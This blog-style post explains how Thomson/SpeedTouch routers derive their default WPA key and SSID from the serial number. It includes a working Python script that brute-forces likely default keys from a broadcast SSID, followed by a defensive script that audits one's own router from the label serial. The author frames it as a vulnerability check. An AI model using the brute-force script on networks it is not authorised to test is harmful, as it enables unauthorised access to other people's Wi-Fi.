In case you didn’t know, the default WPA key in Thomson/SpeedTouch routers is generated from the router’s serial. By some strange coincidence, so is the router’s SSID, which means that if you know the SSID (which is public knowledge), you can brute-force the serial.
There are programs to do this already, but they were not future-proof or open enough to work now, so I wrote a small Python script to do it. Just enter the last part of the router’s SSID (e.g. 99AF3C in Thomson-99AF3C) and the script will find the likely WPA keys.
You can use this script to verify that your router is vulnerable and change the encryption key, but please don’t use it to break into other people’s networks! That’s rude.
EDIT: I updated the algorithm; it now features 200% more correctness and 400% more slowness :/ Sadly, it’s many times slower than similar tools, but maybe it will be useful to you somehow. Speedup tips appreciated!
Here it is:
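#!/usr/bin/env python3
import sys
import hashlib
from binascii import hexlify as hexl
from itertools import product as prod

# psyco is an optional Python 2 JIT; carry on without it when it is missing.
try:
    import psyco
    psyco.full()
except ImportError:
    pass

if len(sys.argv) != 2:
    print("speedtouchkey.py <SSID>")
    sys.exit(1)

# Characters that can appear in the last three positions of the serial.
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ssid = sys.argv[1].lower().strip()
try:
    int(ssid, 16)
except ValueError:
    print("%s is not a valid SSID." % ssid)
    sys.exit(1)

for year in range(8, 11):
    print("Searching year %02d..." % year)
    for week in range(1, 53):
        for xxx in prod(chars, chars, chars):
            xx = "".join(xxx)
            # The hashed serial carries the last three characters as the hex of their ASCII codes.
            serial = "CP%02d%02d%s" % (year, week, hexl(xx.encode("ascii")).decode("ascii").upper())
            sha = hashlib.sha1(serial.encode("ascii")).hexdigest()
            # The SSID suffix is the tail of the digest; the key is its first ten hex digits, upper-cased.
            if sha.endswith(ssid):
                print(" Likely key: %s (serial %s)." % (sha[:10].upper(), "CP%02d%02d??%s" % (year, week, xx)))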
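For the "verify and change the key" case on a router you own, no search is needed: the serial is printed on the label. The following is an added example, not part of the original script; it assumes the serial layout the script above implies (CP, year, week, two characters that are not hashed, three characters from 0-9A-Z), and the names `derive_defaults` and `audit` are hypothetical.

```python
import hashlib
import re

# Serial layout assumed from the script above: "CP", two-digit year, two-digit
# week, two characters that are not hashed, then three characters from 0-9A-Z.
SERIAL_RE = re.compile(r"CP(\d{2})(\d{2})..([0-9A-Z]{3})")


def derive_defaults(label_serial):
    """Return (ssid_suffix, default_key) for the serial printed on the router."""
    match = SERIAL_RE.fullmatch(label_serial.strip().upper())
    if match is None:
        raise ValueError("serial does not look like CPYYWW??XXX")
    year, week, tail = match.groups()
    # The last three characters are hashed as the hex of their ASCII codes.
    hashed = "CP" + year + week + tail.encode("ascii").hex().upper()
    digest = hashlib.sha1(hashed.encode("ascii")).hexdigest().upper()
    return digest[-6:], digest[:10]


def audit(label_serial, broadcast_ssid, configured_key):
    """Return (ssid_is_factory, key_is_factory) for a router you administer."""
    ssid_suffix, default_key = derive_defaults(label_serial)
    ssid_is_factory = broadcast_ssid.strip().upper().endswith(ssid_suffix)
    # Case-insensitive on purpose: the default re-typed in lower case is
    # just as guessable as the original.
    key_is_factory = configured_key.strip().upper() == default_key
    return ssid_is_factory, key_is_factory


if __name__ == "__main__":
    serial = "CP0915ZZABC"  # constructed sample, not a real device
    suffix, key = derive_defaults(serial)
    for ssid, psk in (("Thomson" + suffix, key), ("HomeNet", "a long custom passphrase")):
        ssid_default, key_default = audit(serial, ssid, psk)
        if key_default:
            verdict = "change the key: it is the factory default"
        elif ssid_default:
            verdict = "key changed; SSID still reveals the factory scheme"
        else:
            verdict = "SSID and key both changed"
        print("%-16s %s" % (ssid, verdict))
```

Changing only the SSID does not help while the key is still the factory one; the key itself has to be replaced.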